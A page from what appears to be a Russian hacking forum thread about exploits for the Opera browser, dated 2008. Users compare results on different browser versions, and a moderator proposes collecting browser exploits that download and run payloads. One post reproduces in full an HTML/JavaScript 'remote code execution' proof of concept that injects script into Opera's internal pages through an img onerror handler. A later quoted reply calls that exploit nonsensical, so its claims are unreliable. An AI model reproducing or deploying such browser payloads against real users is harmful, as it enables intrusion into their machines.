ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
Перезагрузить страницу Эксплойты для Opera
   
Ответ
Страница 4 из 5 < 1 2 3 4 5 >
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 31.10.2008, 12:08
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию
на 9.61 не сработала. (win32)
 
Ответить с цитированием

  #32  
Старый 31.10.2008, 12:11
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
аналогично
 
Ответить с цитированием

  #33  
Старый 31.10.2008, 12:39
GlOFF
Постоянный
Регистрация: 08.05.2006
Сообщений: 816
Провел на форуме:
1845671

Репутация: 1338


По умолчанию
Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все )
 
Ответить с цитированием

  #34  
Старый 31.10.2008, 12:43
DVD_RW
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203

Репутация: 628


По умолчанию
у мну включается калькулятор .. ток надо нажать Click me... и там всякие ерроры и обратно и калькулятор
 
Ответить с цитированием

  #35  
Старый 31.10.2008, 13:32
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию
Цитата:
Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все )
Бгг єт не чак нашел багу) см копирайты)
 
Ответить с цитированием

  #36  
Старый 31.10.2008, 14:07
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
а как будет выглядеть сплойт еси надо че то подгрузить???и запустить
можт соберем побольше сплойтов для браузеров
 
Ответить с цитированием

Opera 9.62 Exploit
  #37  
Старый 02.11.2008, 18:13
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
Exclamation Opera 9.62 Exploit
OPERA 9.62 Remote Code Execution
Код:
<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>
Потестить на себе можно тут
скачать:тут
 
Ответить с цитированием

  #38  
Старый 02.11.2008, 18:19
[Dezzter]
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198

Репутация: 341
По умолчанию
что позволяет уязвимость сделать на уязвимой тачке???
 
Ответить с цитированием

  #39  
Старый 02.11.2008, 18:20
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию
Выполнение произвольноо кода, разве не видно? В примере вызывается калькулятор.
 
Ответить с цитированием

  #40  
Старый 02.11.2008, 18:22
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349

Репутация: 808


По умолчанию
Цитата:
This presumed "exploit" just proves that "NeoCoderz" doesn't understand what the problem was, and trust me - his "exploit code" in fact makes no sense AT ALL. Seriously - he's trying to "inject" code that will simply eval() a string which is the path to calc.exe - as if that would automagically change Opera's preferences or make Opera throw that path at the system and execute it. Totally clueless. (He even claims his "exploit" is "injecting" this code into pages that do not accept any input - like opera:plugins and opera:about.
Источник.
 
Ответить с цитированием
Ответ
Страница 4 из 5 < 1 2 3 4 5 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ